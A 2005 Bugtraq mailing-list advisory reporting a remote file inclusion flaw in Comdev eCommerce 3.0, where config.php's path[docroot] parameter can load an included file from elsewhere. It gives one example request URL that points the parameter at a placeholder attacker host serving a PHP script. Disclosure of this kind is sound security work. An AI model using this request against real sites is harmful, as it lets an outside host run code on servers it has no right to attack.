[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Comdev eCommerce config.php Vulnerability
From: none () none ! com
Date: 2005-08-05 1:57:08
Message-ID: 20050805015708.7116.qmail () securityfocus ! com
[Download RAW message or body]
Class: Input Validation Error
Vulnerable: Comdev Comdev eCommerce 3.0
The config.php script can be passed a "path[docroot]" http request parameter to \
change the location of an included file.
Example:
http://www.vulnerable.com/oneadmin/config.php?path[docroot]=http://www.hacker.com/badscript.php.txt
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic